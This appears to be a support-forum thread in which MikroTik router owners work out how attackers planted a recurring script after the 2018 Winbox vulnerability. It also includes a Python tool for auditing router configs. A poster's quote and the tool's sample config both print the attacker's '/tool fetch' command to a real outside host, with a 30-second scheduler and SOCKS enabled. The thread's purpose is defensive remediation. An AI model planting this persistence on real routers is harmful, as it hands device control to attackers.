We are observing some fetch:file “mikrotik.php” automatically downloaded on all types of devices, i.e. SXT lite, RB 750 UP, RB 2011UIAS, groove, etc.
We see script added to mikrotik again and again, even after upgrading to latest version.
Upgrade the device to 6.40.8 or 6.42.6 and change your password. Also improve your network security according to these guides:
https://blog.mikrotik.com
Socks is also getting enabled automatically in the devices where this file is getting downloaded. Kindly suggest why this is happening?
Please read above post.
Normis… I’m being attacked by this vulnerability; 17 hours ago the attack began, 07/23/2018 16:00 GMT-3. I have installed RouterOS v6.41.3 and the www service is disabled, but they have still entered and installed a script.
I think they injected the script from another service, I’m not sure. But I can see the hour.
I’m running backup and updating to the latest version but I think the vulnerability is still there, I’m going to deactivate all external services except Winbox for the moment and change password.
Screenshot:
Upgrade to version that is not vulnerable. See details here:
https://blog.mikrotik.com/security/winbox-vulnerability.html
How can that happen? I totally missed the announcement on the blog by Mikrotik.
I see the same behavior on my RB951G-2HnD - the log shows that mikrotik.php was downloaded (I see it in the files section - it is a blank PHP file), followed by a lot of telnet login attempts.
I upgraded to the latest version, changed the telnet and ssh ports.
Results:
No more telnet login attempts present in log.
Downloading of the mikrotik.php file continues (!!!)
What is happening here? How do I stop this?
I closed the WinBox access from WAN but the downloading of the mikrotik.php continues every 30 seconds exactly.
Any ideas?
OK I understood now what “they” did:
Somehow they managed to set up a script (created by my user!?) with the following content:
/tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http
Apart from fetching this empty .php file I don’t see any other actions anywhere else.
After I removed the script, silent times came back… but this was disturbing…
Thank You mrz, Fixed Problem.
I read in the blog about the attack on the web service. I did not see that the same problem was present on port 8291 of WinBox.
Hello guys!
I noticed this problem today. Found a malicious script under system/scripts. Remove it.
Upgrading ROS didn’t help.
Change your passwords, block port 2008, turn off ip/socks!!!
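As an added illustration (not code from any poster in this thread): an offline audit of a RouterOS /export that flags the persistence pattern described above: a /tool fetch script, a scheduler that runs it, and SOCKS switched on. The sample export is constructed; the address and port are those quoted earlier in the thread, and the 30 s interval matches the observed fetch cadence.

```python
import re
from typing import Dict, List

# Constructed sample of a RouterOS "/export" modelled on this thread: a script that
# fetches mikrotik.php from the quoted address, a scheduler running it every 30 s,
# and SOCKS switched on. The "backup" script is a benign entry that must not fire.
SAMPLE_EXPORT = r"""
# jul/24/2018 10:00:00 by RouterOS 6.42.6
/ip socks
set enabled=yes port=1080
/system script
add name=script1 owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive \
    source="/tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http"
add name=backup owner=admin policy=read,write source="/system backup save name=daily"
/system scheduler
add interval=30s name=schedule1 on-event=script1 policy=read,write start-time=startup
"""

def _logical_lines(text: str) -> List[str]:
    """Re-join lines RouterOS wrapped with a trailing backslash; drop blanks and comments."""
    joined = re.sub(r"\\\n\s*", "", text)
    return [ln.strip() for ln in joined.splitlines() if ln.strip() and not ln.lstrip().startswith("#")]

def _fields(line: str) -> Dict[str, str]:
    """Parse key=value pairs; a quoted value may itself contain '=' signs."""
    return {k: v.strip('"') for k, v in re.findall(r'(\S+?)=("[^"]*"|\S+)', line)}

def audit_routeros_export(text: str) -> List[Dict[str, str]]:
    """Flag persistence indicators: fetch scripts, schedulers that run them, SOCKS on."""
    findings, section, scripts = [], "", {}
    for line in _logical_lines(text):
        if line.startswith("/"):            # menu path, e.g. "/system script"
            section = line
            continue
        f = _fields(line)
        name = f.get("name", "?")
        if section == "/ip socks" and f.get("enabled") == "yes":
            findings.append({"type": "socks-enabled", "name": "socks", "detail": line})
        elif section == "/system script":
            scripts[name] = f.get("source", "")
            if "/tool fetch" in scripts[name]:
                findings.append({"type": "fetch-script", "name": name, "detail": scripts[name]})
        elif section == "/system scheduler":
            target = f.get("on-event", "")  # a script name or an inline command
            if "/tool fetch" in scripts.get(target, target):
                findings.append({"type": "fetch-scheduler", "name": name,
                                 "detail": f"runs {target} every {f.get('interval', '?')}"})
    return findings
```

Run it against a real export saved from the router (or paste the export text into SAMPLE_EXPORT); a clean device returns an empty list, and any finding names the script or scheduler entry to remove before changing passwords.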
TomosRider, could they inject the script after updating to RouterOS v6.42.6..?
Everyone, the issue is that somebody could have gotten your password a long time ago, through the winbox vulnerability published a few months ago. Even if you have upgraded, they still have your password, they just used it now. So upgrade fixes the vulnerability, but you have to change your password after upgrading.